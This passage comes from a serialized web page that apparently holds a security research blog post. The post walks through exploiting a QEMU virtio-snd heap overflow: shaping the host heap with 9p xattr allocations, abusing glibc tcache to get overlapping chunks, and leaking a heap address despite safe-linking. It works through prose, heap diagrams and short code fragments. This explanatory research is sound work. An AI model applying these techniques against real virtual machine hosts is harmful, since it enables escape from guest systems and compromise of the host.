",{"type":28,"tag":116,"props":127944,"children":127945},{"style":370},[127946],{"type":33,"value":373},{"type":28,"tag":116,"props":127948,"children":127949},{"style":370},[127950],{"type":33,"value":50874},{"type":28,"tag":116,"props":127952,"children":127953},{"style":266},[127954],{"type":33,"value":127955},"E2BIG;\n",{"type":28,"tag":116,"props":127957,"children":127958},{"class":245,"line":1137},[127959,127963],{"type":28,"tag":116,"props":127960,"children":127961},{"style":260},[127962],{"type":33,"value":127881},{"type":28,"tag":116,"props":127964,"children":127965},{"style":266},[127966],{"type":33,"value":127886},{"type":28,"tag":116,"props":127968,"children":127969},{"class":245,"line":1181},[127970],{"type":28,"tag":116,"props":127971,"children":127972},{"style":266},[127973],{"type":33,"value":3025},{"type":28,"tag":116,"props":127975,"children":127976},{"class":245,"line":1212},[127977],{"type":28,"tag":116,"props":127978,"children":127979},{"emptyLinePlaceholder":19},[127980],{"type":33,"value":1044},{"type":28,"tag":116,"props":127982,"children":127983},{"class":245,"line":1254},[127984],{"type":28,"tag":116,"props":127985,"children":127986},{"style":266},[127987],{"type":33,"value":104414},{"type":28,"tag":116,"props":127989,"children":127990},{"class":245,"line":1262},[127991],{"type":28,"tag":116,"props":127992,"children":127993},{"emptyLinePlaceholder":19},[127994],{"type":33,"value":1044},{"type":28,"tag":116,"props":127996,"children":127997},{"class":245,"line":1294},[127998,128002,128006,128010,128015,128019,128023,128027,128032,128036,128040],{"type":28,"tag":116,"props":127999,"children":128000},{"style":282},[128001],{"type":33,"value":127770},{"type":28,"tag":116,"props":128003,"children":128004},{"style":266},[128005],{"type":33,"value":313},{"type":28,"tag":116,"props":128007,"children":128008},{"style":370},[128009],{"type":33,"value":2780},{"type":28,"tag":116,"props":128011,"children":128012},{"style":272},[128013],{"type":33,"value":128014},"xattr_fidp",{"type":28,"tag":116,"props":128016,"children":128017},{"style":266},[128018],{"type":33,"value":13423},{"type":28,"tag":116,"props":128020,"children":128021},{"style":272},[128022],{"type":33,"value":36606},{"type":28,"tag":116,"props":128024,"children":128025},{"style":266},[128026],{"type":33,"value":141},{"type":28,"tag":116,"props":128028,"children":128029},{"style":272},[128030],{"type":33,"value":128031},"xattr",{"type":28,"tag":116,"props":128033,"children":128034},{"style":266},[128035],{"type":33,"value":141},{"type":28,"tag":116,"props":128037,"children":128038},{"style":272},[128039],{"type":33,"value":48119},{"type":28,"tag":116,"props":128041,"children":128042},{"style":266},[128043],{"type":33,"value":895},{"type":28,"tag":116,"props":128045,"children":128046},{"class":245,"line":1334},[128047,128052,128056,128060,128064,128068,128072,128076,128080,128084,128088,128092,128096],{"type":28,"tag":116,"props":128048,"children":128049},{"style":282},[128050],{"type":33,"value":128051},"    v9fs_string_copy",{"type":28,"tag":116,"props":128053,"children":128054},{"style":266},[128055],{"type":33,"value":313},{"type":28,"tag":116,"props":128057,"children":128058},{"style":370},[128059],{"type":33,"value":2780},{"type":28,"tag":116,"props":128061,"children":128062},{"style":272},[128063],{"type":33,"value":128014},{"type":28,"tag":116,"props":128065,"children":128066},{"style":266},[128067],{"type":33,"value":13423},{"type":28,"tag":116,"props":128069,"children":128070},{"style":272},[128071],{"type":33,"value":36606},{"type":28,"tag":116,"props":128073,"children":128074},{"style":266},[128075],{"type":33,"value":141},{"type":28,"tag":116,"props":128077,"children":128078},{"style":272},[128079],{"type":33,"value":128031},{"type":28,"tag":116,"props":128081,"children":128082},{"style":266},[128083],{"type":33,"value":141},{"type":28,"tag":116,"props":128085,"children":128086},{"style":272},[128087],{"type":33,"value":48119},{"type":28,"tag":116,"props":128089,"children":128090},{"style":266},[128091],{"type":33,"value":825},{"type":28,"tag":116,"props":128093,"children":128094},{"style":370},[128095],{"type":33,"value":2780},{"type":28,"tag":116,"props":128097,"children":128098},{"style":266},[128099],{"type":33,"value":127783},{"type":28,"tag":116,"props":128101,"children":128102},{"class":245,"line":1372},[128103,128108,128112,128116,128120,128124,128128,128132,128136,128140],{"type":28,"tag":116,"props":128104,"children":128105},{"style":272},[128106],{"type":33,"value":128107},"    xattr_fidp",{"type":28,"tag":116,"props":128109,"children":128110},{"style":266},[128111],{"type":33,"value":13423},{"type":28,"tag":116,"props":128113,"children":128114},{"style":272},[128115],{"type":33,"value":36606},{"type":28,"tag":116,"props":128117,"children":128118},{"style":266},[128119],{"type":33,"value":141},{"type":28,"tag":116,"props":128121,"children":128122},{"style":272},[128123],{"type":33,"value":128031},{"type":28,"tag":116,"props":128125,"children":128126},{"style":266},[128127],{"type":33,"value":141},{"type":28,"tag":116,"props":128129,"children":128130},{"style":272},[128131],{"type":33,"value":38773},{"type":28,"tag":116,"props":128133,"children":128134},{"style":370},[128135],{"type":33,"value":2226},{"type":28,"tag":116,"props":128137,"children":128138},{"style":282},[128139],{"type":33,"value":123786},{"type":28,"tag":116,"props":128141,"children":128142},{"style":266},[128143],{"type":33,"value":128144},"(size);\n",{"type":28,"tag":116,"props":128146,"children":128147},{"class":245,"line":1381},[128148],{"type":28,"tag":116,"props":128149,"children":128150},{"style":266},[128151],{"type":33,"value":406},{"type":28,"tag":29,"props":128153,"children":128154},{},[128155,128157,128162,128164,128169,128170,128175,128177,128182],{"type":33,"value":128156},"Because the ",{"type":28,"tag":98,"props":128158,"children":128160},{"className":128159},[],[128161],{"type":33,"value":127518},{"type":33,"value":128163}," field is handled as a string, embedded null bytes are not preserved, which makes it less useful for our purposes. It also introduces some extra allocation noise into the heap, since creating an xattr allocates both ",{"type":28,"tag":98,"props":128165,"children":128167},{"className":128166},[],[128168],{"type":33,"value":127518},{"type":33,"value":10659},{"type":28,"tag":98,"props":128171,"children":128173},{"className":128172},[],[128174],{"type":33,"value":127525},{"type":33,"value":128176},", not just the ",{"type":28,"tag":98,"props":128178,"children":128180},{"className":128179},[],[128181],{"type":33,"value":127525},{"type":33,"value":128183}," we actually care about. But we will get around this later in the blog post.",{"type":28,"tag":29,"props":128185,"children":128186},{},[128187,128188,128193],{"type":33,"value":16275},{"type":28,"tag":98,"props":128189,"children":128191},{"className":128190},[],[128192],{"type":33,"value":127525},{"type":33,"value":128194}," field, however, is much more interesting: it gives us a guest-controlled heap allocation of an arbitrary size. Each of these allocations is tied to its own xattr FID, which means it stays alive for as long as that FID remains live. In practice, this gives us a large number of persistent host-side heap objects that we can manage individually.",{"type":28,"tag":29,"props":128196,"children":128197},{},[128198,128200,128205,128207,128213,128215,128221,128223,128229],{"type":33,"value":128199},"Once allocated, we can write arbitrary bytes into the ",{"type":28,"tag":98,"props":128201,"children":128203},{"className":128202},[],[128204],{"type":33,"value":127525},{"type":33,"value":128206}," buffer through a ",{"type":28,"tag":98,"props":128208,"children":128210},{"className":128209},[],[128211],{"type":33,"value":128212},"P9_TWRITE",{"type":33,"value":128214}," request on the corresponding xattr FID. We can also read the contents back with ",{"type":28,"tag":98,"props":128216,"children":128218},{"className":128217},[],[128219],{"type":33,"value":128220},"P9_TREAD",{"type":33,"value":128222},", which is useful later when turning overlap into stronger primitives. Finally, we can free any individual allocation at any time by issuing a ",{"type":28,"tag":98,"props":128224,"children":128226},{"className":128225},[],[128227],{"type":33,"value":128228},"P9_TCLUNK",{"type":33,"value":128230}," request on that same FID.",{"type":28,"tag":29,"props":128232,"children":128233},{},[128234,128236,128242],{"type":33,"value":128235},"This gives us a very strong heap shaping primitive in QEMU - allocate on demand, choose the size precisely (up to ",{"type":28,"tag":98,"props":128237,"children":128239},{"className":128238},[],[128240],{"type":33,"value":128241},"65536",{"type":33,"value":128243}," bytes, which is more than enough here), fully control the contents of the allocation, keep it alive as long as needed, and free it selectively later.",{"type":28,"tag":75,"props":128245,"children":128247},{"id":128246},"setting-the-heap-layout",[128248],{"type":33,"value":128249},"Setting the Heap Layout",{"type":28,"tag":29,"props":128251,"children":128252},{},[128253,128255,128260],{"type":33,"value":128254},"Ideally, we want a contiguous heap region consisting only of ",{"type":28,"tag":98,"props":128256,"children":128258},{"className":128257},[],[128259],{"type":33,"value":127525},{"type":33,"value":128261}," allocations, like this:",{"type":28,"tag":234,"props":128263,"children":128265},{"code":128264},"   0x200      0x200      0x200      0x200      0x200\n+----------+----------+----------+----------+----------+\n|          |          |          |          |          |\n| .value A | .value B | .value C | .value D | .value E |\n|          |          |          |          |          |\n+----------+----------+----------+----------+----------+\n",[128266],{"type":28,"tag":98,"props":128267,"children":128268},{"__ignoreMap":7},[128269],{"type":33,"value":128264},{"type":28,"tag":29,"props":128271,"children":128272},{},[128273,128275,128280,128282,128287,128289,128294],{"type":33,"value":128274},"This lets us later create holes by freeing every other ",{"type":28,"tag":98,"props":128276,"children":128278},{"className":128277},[],[128279],{"type":33,"value":127525},{"type":33,"value":128281}," allocation. Those freed chunks enter the freelist, allowing the overflowing virtio-snd buffer to be allocated into one of those holes and overflow into the ",{"type":28,"tag":98,"props":128283,"children":128285},{"className":128284},[],[128286],{"type":33,"value":123873},{"type":33,"value":128288}," field of the next live ",{"type":28,"tag":98,"props":128290,"children":128292},{"className":128291},[],[128293],{"type":33,"value":127525},{"type":33,"value":128295}," chunk.",{"type":28,"tag":29,"props":128297,"children":128298},{},[128299],{"type":33,"value":128300},"Of course, we do not know the initial state of the heap. In practice, it is fragmented and already contains many freelist entries. Fortunately, this is not a problem for glibc, since the allocator is deterministic. By allocating enough chunks of the size we want, malloc will first consume any suitable entries already present in the freelist. Once those are exhausted, subsequent allocations will be served from the top chunk in a contiguous fashion, giving us the continuous region we need.",{"type":28,"tag":29,"props":128302,"children":128303},{},[128304,128306,128311,128313,128318,128320,128325,128327,128332],{"type":33,"value":128305},"As mentioned earlier, ",{"type":28,"tag":98,"props":128307,"children":128309},{"className":128308},[],[128310],{"type":33,"value":127562},{"type":33,"value":128312}," always allocates two chunks: one for ",{"type":28,"tag":98,"props":128314,"children":128316},{"className":128315},[],[128317],{"type":33,"value":127518},{"type":33,"value":128319}," and one for ",{"type":28,"tag":98,"props":128321,"children":128323},{"className":128322},[],[128324],{"type":33,"value":127525},{"type":33,"value":128326},". We want to avoid having ",{"type":28,"tag":98,"props":128328,"children":128330},{"className":128329},[],[128331],{"type":33,"value":127518},{"type":33,"value":128333}," chunks inside our main contiguous region. There are two ways to approach this:",{"type":28,"tag":455,"props":128335,"children":128336},{},[128337,128349],{"type":28,"tag":459,"props":128338,"children":128339},{},[128340,128342,128347],{"type":33,"value":128341},"Make ",{"type":28,"tag":98,"props":128343,"children":128345},{"className":128344},[],[128346],{"type":33,"value":127518},{"type":33,"value":128348}," larger than the mmap threshold, so it is allocated from a separate mapping rather than from the main heap. This would give us the layout we want, but at the cost of dramatically increasing memory usage during heap spraying.",{"type":28,"tag":459,"props":128350,"children":128351},{},[128352,128354,128359,128361,128366,128368,128373],{"type":33,"value":128353},"Prepare a separate region whose sole purpose is to absorb ",{"type":28,"tag":98,"props":128355,"children":128357},{"className":128356},[],[128358],{"type":33,"value":127518},{"type":33,"value":128360},"-sized allocations. Later, when we start building the main contiguous region, malloc will satisfy ",{"type":28,"tag":98,"props":128362,"children":128364},{"className":128363},[],[128365],{"type":33,"value":127518},{"type":33,"value":128367}," allocations from that separate freelist instead of placing them next to our ",{"type":28,"tag":98,"props":128369,"children":128371},{"className":128370},[],[128372],{"type":33,"value":127525},{"type":33,"value":128374}," chunks.",{"type":28,"tag":443,"props":128376,"children":128378},{"id":128377},"separating-name-allocations",[128379],{"type":33,"value":128380},"Separating .name allocations",{"type":28,"tag":29,"props":128382,"children":128383},{},[128384,128386,128391,128393,128398],{"type":33,"value":128385},"We chose the second option. However, it is not as simple as issuing ",{"type":28,"tag":98,"props":128387,"children":128389},{"className":128388},[],[128390],{"type":33,"value":127562},{"type":33,"value":128392}," for N ",{"type":28,"tag":98,"props":128394,"children":128396},{"className":128395},[],[128397],{"type":33,"value":127518},{"type":33,"value":128399},"-sized allocations and then freeing them.",{"type":28,"tag":29,"props":128401,"children":128402},{},[128403,128405,128410,128411,128416,128417,128422,128424,128429,128431,128436],{"type":33,"value":128404},"At this point, we already know that ",{"type":28,"tag":98,"props":128406,"children":128408},{"className":128407},[],[128409],{"type":33,"value":127562},{"type":33,"value":128312},{"type":28,"tag":98,"props":128412,"children":128414},{"className":128413},[],[128415],{"type":33,"value":127518},{"type":33,"value":128319},{"type":28,"tag":98,"props":128418,"children":128420},{"className":128419},[],[128421],{"type":33,"value":127525},{"type":33,"value":128423},". If we simply call it with ",{"type":28,"tag":98,"props":128425,"children":128427},{"className":128426},[],[128428],{"type":33,"value":127525},{"type":33,"value":128430}," sized the same as ",{"type":28,"tag":98,"props":128432,"children":128434},{"className":128433},[],[128435],{"type":33,"value":127518},{"type":33,"value":128437},", we get a layout like this:",{"type":28,"tag":234,"props":128439,"children":128441},{"code":128440},"    0x20       0x20       0x20       0x20       0x20\n+----------+----------+----------+----------+----------+\n|          |          |          |          |          |\n| .name  A | .value A | .name  B | .value B | .name  C |\n|          |          |          |          |          |\n+----------+----------+----------+----------+----------+\n",[128442],{"type":28,"tag":98,"props":128443,"children":128444},{"__ignoreMap":7},[128445],{"type":33,"value":128440},{"type":28,"tag":29,"props":128447,"children":128448},{},[128449,128451,128456,128458,128464,128466,128472,128474,128479,128481,128486,128488,128493],{"type":33,"value":128450},"With that heap state, issuing a ",{"type":28,"tag":98,"props":128452,"children":128454},{"className":128453},[],[128455],{"type":33,"value":128228},{"type":33,"value":128457}," request would first free ",{"type":28,"tag":98,"props":128459,"children":128461},{"className":128460},[],[128462],{"type":33,"value":128463},".name A",{"type":33,"value":128465}," and then ",{"type":28,"tag":98,"props":128467,"children":128469},{"className":128468},[],[128470],{"type":33,"value":128471},".value A",{"type":33,"value":128473},". When ",{"type":28,"tag":98,"props":128475,"children":128477},{"className":128476},[],[128478],{"type":33,"value":128471},{"type":33,"value":128480}," is freed, the allocator sees that the preceding chunk ",{"type":28,"tag":98,"props":128482,"children":128484},{"className":128483},[],[128485],{"type":33,"value":128463},{"type":33,"value":128487}," is already free and immediately consolidates the two. As a result, instead of ending up with many reusable ",{"type":28,"tag":98,"props":128489,"children":128491},{"className":128490},[],[128492],{"type":33,"value":127518},{"type":33,"value":128494},"-sized chunks in the freelist, we would just create a large consolidated free chunk, which is not what we want.",{"type":28,"tag":29,"props":128496,"children":128497},{},[128498],{"type":33,"value":128499},"To avoid that, we take advantage of the fact that chunks freed into tcache are not consolidated. It is also important to note that tcache maintains a separate freelist for each size class within the tcache range, and in this glibc version each such freelist can hold up to 16 entries.",{"type":28,"tag":29,"props":128501,"children":128502},{},[128503,128505,128510,128512,128517,128519,128524,128526,128532,128534,128539,128541,128547],{"type":33,"value":128504},"We begin by draining the tcache freelist for every relevant size class by allocating 16 chunks of each size. Throughout this process, the ",{"type":28,"tag":98,"props":128506,"children":128508},{"className":128507},[],[128509],{"type":33,"value":127518},{"type":33,"value":128511}," allocation remains fixed at size ",{"type":28,"tag":98,"props":128513,"children":128515},{"className":128514},[],[128516],{"type":33,"value":104680},{"type":33,"value":128518},". We first allocate 16 xattrs whose ",{"type":28,"tag":98,"props":128520,"children":128522},{"className":128521},[],[128523],{"type":33,"value":127525},{"type":33,"value":128525}," size is ",{"type":28,"tag":98,"props":128527,"children":128529},{"className":128528},[],[128530],{"type":33,"value":128531},"0x30",{"type":33,"value":128533},". After that, we allocate another 16 xattrs, this time with ",{"type":28,"tag":98,"props":128535,"children":128537},{"className":128536},[],[128538],{"type":33,"value":127525},{"type":33,"value":128540}," size ",{"type":28,"tag":98,"props":128542,"children":128544},{"className":128543},[],[128545],{"type":33,"value":128546},"0x40",{"type":33,"value":128548},", and continue in the same way for each tcache size class.",{"type":28,"tag":29,"props":128550,"children":128551},{},[128552],{"type":33,"value":128553},"This yields the following layout:",{"type":28,"tag":234,"props":128555,"children":128557},{"code":128556},"    0x20        0x30         0x20        0x30\n+---------+--------------+---------+--------------+- - - - -\n|         |              |         |              |\n| .name A |   .value A   | .name B |   .value B   |  . . .\n|         |              |         |              |\n+---------+--------------+---------+--------------+- - - - -\n\n    0x20          0x40           0x20           0x40\n+---------+------------------+---------+------------------+- - - - -\n|         |                  |         |                  |\n| .name C |     .value C     | .name D |     .value D     |  . . .\n|         |                  |         |                  |\n+---------+------------------+---------+------------------+- - - - -\n",[128558],{"type":28,"tag":98,"props":128559,"children":128560},{"__ignoreMap":7},[128561],{"type":33,"value":128556},{"type":28,"tag":29,"props":128563,"children":128564},{},[128565,128567,128572,128574,128579,128581,128586,128588,128593,128595,128600,128602,128607,128608,128613,128615,128620,128622,128627,128629,128634,128636,128641,128643,128648],{"type":33,"value":128566},"At this point, we can free all allocations created during this phase. Because we emptied every tcache freelist, the first 16 ",{"type":28,"tag":98,"props":128568,"children":128570},{"className":128569},[],[128571],{"type":33,"value":127518},{"type":33,"value":128573}," chunks end up in the ",{"type":28,"tag":98,"props":128575,"children":128577},{"className":128576},[],[128578],{"type":33,"value":104680},{"type":33,"value":128580}," tcache bin, along with the interleaved ",{"type":28,"tag":98,"props":128582,"children":128584},{"className":128583},[],[128585],{"type":33,"value":127525},{"type":33,"value":128587}," chunks of size ",{"type":28,"tag":98,"props":128589,"children":128591},{"className":128590},[],[128592],{"type":33,"value":128531},{"type":33,"value":128594},". The next 16 ",{"type":28,"tag":98,"props":128596,"children":128598},{"className":128597},[],[128599],{"type":33,"value":127518},{"type":33,"value":128601}," chunks are interleaved with ",{"type":28,"tag":98,"props":128603,"children":128605},{"className":128604},[],[128606],{"type":33,"value":127525},{"type":33,"value":128587},{"type":28,"tag":98,"props":128609,"children":128611},{"className":128610},[],[128612],{"type":33,"value":128546},{"type":33,"value":128614},"; when freed, those ",{"type":28,"tag":98,"props":128616,"children":128618},{"className":128617},[],[128619],{"type":33,"value":127525},{"type":33,"value":128621}," chunks also go into their corresponding tcache bin instead of consolidating with the adjacent free ",{"type":28,"tag":98,"props":128623,"children":128625},{"className":128624},[],[128626],{"type":33,"value":127518},{"type":33,"value":128628}," chunks. Repeating this across all tcache sizes leaves us with a large region of free ",{"type":28,"tag":98,"props":128630,"children":128632},{"className":128631},[],[128633],{"type":33,"value":127518},{"type":33,"value":128635},"-sized chunks that will later be served to the ",{"type":28,"tag":98,"props":128637,"children":128639},{"className":128638},[],[128640],{"type":33,"value":127518},{"type":33,"value":128642}," allocations of the main contiguous spray - leaving us with the desired layout of adjacent ",{"type":28,"tag":98,"props":128644,"children":128646},{"className":128645},[],[128647],{"type":33,"value":127525},{"type":33,"value":128374},{"type":28,"tag":75,"props":128650,"children":128652},{"id":128651},"corrupting-the-size",[128653],{"type":33,"value":128654},"Corrupting the Size",{"type":28,"tag":29,"props":128656,"children":128657},{},[128658,128660,128665,128667,128672,128674,128679,128681,128686,128687,128692],{"type":33,"value":128659},"The input format is guest-controlled, and we choose ",{"type":28,"tag":98,"props":128661,"children":128663},{"className":128662},[],[128664],{"type":33,"value":3091},{"type":33,"value":128666}," (unsigned 8-bit PCM). As noted earlier, silence in ",{"type":28,"tag":98,"props":128668,"children":128670},{"className":128669},[],[128671],{"type":33,"value":3091},{"type":33,"value":128673}," is centered at ",{"type":28,"tag":98,"props":128675,"children":128677},{"className":128676},[],[128678],{"type":33,"value":29095},{"type":33,"value":128680}," (rather than ",{"type":28,"tag":98,"props":128682,"children":128684},{"className":128683},[],[128685],{"type":33,"value":125780},{"type":33,"value":125767},{"type":28,"tag":98,"props":128688,"children":128690},{"className":128689},[],[128691],{"type":33,"value":125758},{"type":33,"value":128693},"), which biases this uncontrolled overflow toward larger byte values and increases the chance that the corrupted size grows.",{"type":28,"tag":29,"props":128695,"children":128696},{},[128697,128699,128704],{"type":33,"value":128698},"As we already concluded, ",{"type":28,"tag":98,"props":128700,"children":128702},{"className":128701},[],[128703],{"type":33,"value":125223},{"type":33,"value":128705}," is called with the amount:",{"type":28,"tag":234,"props":128707,"children":128709},{"code":128708},"MIN(available, (stream->params.period_bytes - buffer->size))\n",[128710],{"type":28,"tag":98,"props":128711,"children":128712},{"__ignoreMap":7},[128713],{"type":33,"value":128708},{"type":28,"tag":29,"props":128715,"children":128716},{},[128717,128719,128724,128726,128731],{"type":33,"value":128718},"And as mentioned earlier, ",{"type":28,"tag":98,"props":128720,"children":128722},{"className":128721},[],[128723],{"type":33,"value":125254},{"type":33,"value":128725}," is fully guest-controlled, so we can set it such that the overflow reaches exactly far enough to overwrite only the lowest byte of the next chunk's ",{"type":28,"tag":98,"props":128727,"children":128729},{"className":128728},[],[128730],{"type":33,"value":123873},{"type":33,"value":57944},{"type":28,"tag":29,"props":128733,"children":128734},{},[128735,128737,128742,128744,128749],{"type":33,"value":128736},"With the desired heap layout of repeated ",{"type":28,"tag":98,"props":128738,"children":128740},{"className":128739},[],[128741],{"type":33,"value":127427},{"type":33,"value":128743},"-sized ",{"type":28,"tag":98,"props":128745,"children":128747},{"className":128746},[],[128748],{"type":33,"value":127525},{"type":33,"value":128750}," chunks in place, we can then free every other one:",{"type":28,"tag":234,"props":128752,"children":128754},{"code":128753},"               Free                  Free\n+----------+----------+----------+----------+----------+\n|          |..........|          |..........|          |\n| .value A |..........| .value C |..........| .value E |\n|          |..........|          |..........|          |\n+----------+----------+----------+----------+----------+\n",[128755],{"type":28,"tag":98,"props":128756,"children":128757},{"__ignoreMap":7},[128758],{"type":33,"value":128753},{"type":28,"tag":29,"props":128760,"children":128761},{},[128762,128764,128769],{"type":33,"value":128763},"We then allocate the overflowing virtio-snd buffer into one of those holes, start the stream, and let it overflow into the size field of the ",{"type":28,"tag":98,"props":128765,"children":128767},{"className":128766},[],[128768],{"type":33,"value":127525},{"type":33,"value":128770}," chunk directly next to it:",{"type":28,"tag":234,"props":128772,"children":128774},{"code":128773},"           +----------+\n           |          |              Free\n+----------|  buffer  |----------+----------+----------+\n|          |          |          |..........|          |\n| .value A +----------+ .value C |..........| .value E |\n|          |          |          |..........|          |\n+----------+          +----------+----------+----------+\n",[128775],{"type":28,"tag":98,"props":128776,"children":128777},{"__ignoreMap":7},[128778],{"type":33,"value":128773},{"type":28,"tag":29,"props":128780,"children":128781},{},[128782,128784,128789,128791,128796],{"type":33,"value":128783},"After the overflow, the virtio-snd buffer is freed by QEMU. We then refill all of the holes created for the virtio-snd buffer by allocating new ",{"type":28,"tag":98,"props":128785,"children":128787},{"className":128786},[],[128788],{"type":33,"value":127427},{"type":33,"value":128790},"-sized chunks in their place. At that point, we are left with a layout similar to the original one, except that one ",{"type":28,"tag":98,"props":128792,"children":128794},{"className":128793},[],[128795],{"type":33,"value":127525},{"type":33,"value":128797}," chunk now has a corrupted and likely oversized size field:",{"type":28,"tag":234,"props":128799,"children":128801},{"code":128800},"                      Oversized chunk\n                             |\n                      +------+------+\n                      |             |\n                      v             v\n+----------+----------+----------+----------+----------+\n|          |          |          |          |          |\n| .value A | .value X | .value C | .value Y | .value E |\n|          |          |          |          |          |\n+----------+----------+----------+----------+----------+\n",[128802],{"type":28,"tag":98,"props":128803,"children":128804},{"__ignoreMap":7},[128805],{"type":33,"value":128800},{"type":28,"tag":29,"props":128807,"children":128808},{},[128809,128811,128816],{"type":33,"value":128810},"At this point, we can free the chunks left over from the initial contiguous spray. Because one chunk now has a corrupted, larger size field, freeing it causes a single oversized chunk to be inserted into one of the tcache bins in the range ",{"type":28,"tag":98,"props":128812,"children":128814},{"className":128813},[],[128815],{"type":33,"value":127442},{"type":33,"value":4160},{"type":28,"tag":234,"props":128818,"children":128820},{"code":128819},"                           Free\n                        0x210-0x2f0\n                             |\n                      +------+------+\n   Free               |             |          Free\n   0x200              v             v          0x200\n+----------+----------+----------+----------+----------+\n|..........|          |..........|          |..........|\n|..........| .value X |..........| .value Y |..........|\n|..........|          |..........|          |..........|\n+----------+----------+----------+----------+----------+\n",[128821],{"type":28,"tag":98,"props":128822,"children":128823},{"__ignoreMap":7},[128824],{"type":33,"value":128819},{"type":28,"tag":29,"props":128826,"children":128827},{},[128828,128830,128835],{"type":33,"value":128829},"We then once again fill the remaining holes and recover the oversized chunk by simply allocating every size in the possible range (",{"type":28,"tag":98,"props":128831,"children":128833},{"className":128832},[],[128834],{"type":33,"value":127442},{"type":33,"value":1484},{"type":28,"tag":234,"props":128837,"children":128839},{"code":128838},"                         .value B\n                      +-------------+\n                      |             |\n                      v             v\n+----------+----------+----------+--+-------+----------+\n|          |          |          |//|       |          |\n| .value A | .value X |          |//|       | .value C |\n|          |          |          |//|       |          |\n+----------+----------+----------+--+-------+----------+\n                                 ^          ^\n                                 |          |\n                                 +----------+\n                                   .value Y\n",[128840],{"type":28,"tag":98,"props":128841,"children":128842},{"__ignoreMap":7},[128843],{"type":33,"value":128838},{"type":28,"tag":29,"props":128845,"children":128846},{},[128847,128849,128855],{"type":33,"value":128848},"After reclaiming it, we use that chunk to overwrite the size of the next chunk again, but this time we set it to ",{"type":28,"tag":98,"props":128850,"children":128852},{"className":128851},[],[128853],{"type":33,"value":128854},"0x400",{"type":33,"value":128856}," - this gives us a chunk that fully overlaps the chunk next to it, leaving us in the following final state:",{"type":28,"tag":234,"props":128858,"children":128860},{"code":128859},"                                    .value Y extended\n                                            |\n                                 +----------+----------+\n                                 |                     |\n                                 v                     v\n+----------+----------+----------+----------+----------+\n|          |          |          |          |          |\n| .value A | .value X | .value B | .value Y | .value C |\n|          |          |          |          |          |\n+----------+----------+----------+----------+----------+\n",[128861],{"type":28,"tag":98,"props":128862,"children":128863},{"__ignoreMap":7},[128864],{"type":33,"value":128859},{"type":28,"tag":75,"props":128866,"children":128868},{"id":128867},"leaking-a-heap-address",[128869],{"type":33,"value":128870},"Leaking a Heap Address",{"type":28,"tag":29,"props":128872,"children":128873},{},[128874],{"type":33,"value":128875},"We begin by leaking a heap address, since that is the simplest target at this stage. More specifically, we want the address of a heap chunk whose contents we control. Once we have that, we gain a region of memory at a known address with controlled contents, which is useful for placing fake objects or reclaiming the same location with other objects and later inspecting them with an arbitrary read primitive.",{"type":28,"tag":29,"props":128877,"children":128878},{},[128879,128881,128887],{"type":33,"value":128880},"To do this, we abuse the forward (",{"type":28,"tag":98,"props":128882,"children":128884},{"className":128883},[],[128885],{"type":33,"value":128886},"fd",{"type":33,"value":128888},") pointers used by tcache freelists. Modern glibc protects these pointers with a mitigation known as safe-linking. Instead of storing the next free chunk pointer directly, glibc encodes it by XORing it with the address of the current chunk, shifted right by 12:",{"type":28,"tag":234,"props":128890,"children":128892},{"code":128891},"fd = next ^ (curr >> 12)\n",[128893],{"type":28,"tag":98,"props":128894,"children":128895},{"__ignoreMap":7},[128896],{"type":33,"value":128891},{"type":28,"tag":29,"props":128898,"children":128899},{},[128900,128902,128907,128908,128913],{"type":33,"value":128901},"When a tcache bin is empty and a single chunk is inserted into it, ",{"type":28,"tag":98,"props":128903,"children":128905},{"className":128904},[],[128906],{"type":33,"value":57184},{"type":33,"value":5172},{"type":28,"tag":98,"props":128909,"children":128911},{"className":128910},[],[128912],{"type":33,"value":54114},{"type":33,"value":128914}," because there is no following entry. In that case, the encoding becomes:",{"type":28,"tag":234,"props":128916,"children":128918},{"code":128917},"fd = 0 ^ (curr >> 12)\n",[128919],{"type":28,"tag":98,"props":128920,"children":128921},{"__ignoreMap":7},[128922],{"type":33,"value":128917},{"type":28,"tag":29,"props":128924,"children":128925},{},[128926,128928,128933],{"type":33,"value":128927},"So if we free a single chunk into an empty tcache bin, its ",{"type":28,"tag":98,"props":128929,"children":128931},{"className":128930},[],[128932],{"type":33,"value":128886},{"type":33,"value":128934}," field is effectively just the chunk address shifted right by 12.",{"type":28,"tag":29,"props":128936,"children":128937},{},[128938],{"type":33,"value":128939},"In the overlap we achieved earlier:",{"type":28,"tag":234,"props":128941,"children":128943},{"code":128942},"             .value Y extended\n                     |\n+--------------------+--------------------+\n|                                         |\n|                                         |\nv                                         v\n+--------------------+--------------------+\n|                    |                    |\n|      .value Y      |      .value C      |\n|                    |                    |\n+--------------------+--------------------+\n",[128944],{"type":28,"tag":98,"props":128945,"children":128946},{"__ignoreMap":7},[128947],{"type":33,"value":128942},{"type":28,"tag":29,"props":128949,"children":128950},{},[128951,128953,128959,128961,128967,128969,128975,128977,128982],{"type":33,"value":128952},"We first free ",{"type":28,"tag":98,"props":128954,"children":128956},{"className":128955},[],[128957],{"type":33,"value":128958},".value C",{"type":33,"value":128960}," into tcache and read its contents through the oversized ",{"type":28,"tag":98,"props":128962,"children":128964},{"className":128963},[],[128965],{"type":33,"value":128966},".value Y",{"type":33,"value":128968},". This gives us ",{"type":28,"tag":98,"props":128970,"children":128972},{"className":128971},[],[128973],{"type":33,"value":128974},".value C >> 12",{"type":33,"value":128976},". That is not yet the exact address of ",{"type":28,"tag":98,"props":128978,"children":128980},{"className":128979},[],[128981],{"type":33,"value":128958},{"type":33,"value":128983},", since the lower 12 bits are lost.",{"type":28,"tag":29,"props":128985,"children":128986},{},[128987,128989,128994,128996,129001,129003,129008,129010,129015],{"type":33,"value":128988},"To recover the exact address of a controlled heap chunk, we reclaim ",{"type":28,"tag":98,"props":128990,"children":128992},{"className":128991},[],[128993],{"type":33,"value":128958},{"type":33,"value":128995},", then free a different controlled chunk into the same tcache bin. After that, we free ",{"type":28,"tag":98,"props":128997,"children":128999},{"className":128998},[],[129000],{"type":33,"value":128958},{"type":33,"value":129002}," again. This time, ",{"type":28,"tag":98,"props":129004,"children":129006},{"className":129005},[],[129007],{"type":33,"value":57184},{"type":33,"value":129009}," is no longer ",{"type":28,"tag":98,"props":129011,"children":129013},{"className":129012},[],[129014],{"type":33,"value":54114},{"type":33,"value":129016},", but instead points to that controlled chunk, so the encoded forward pointer 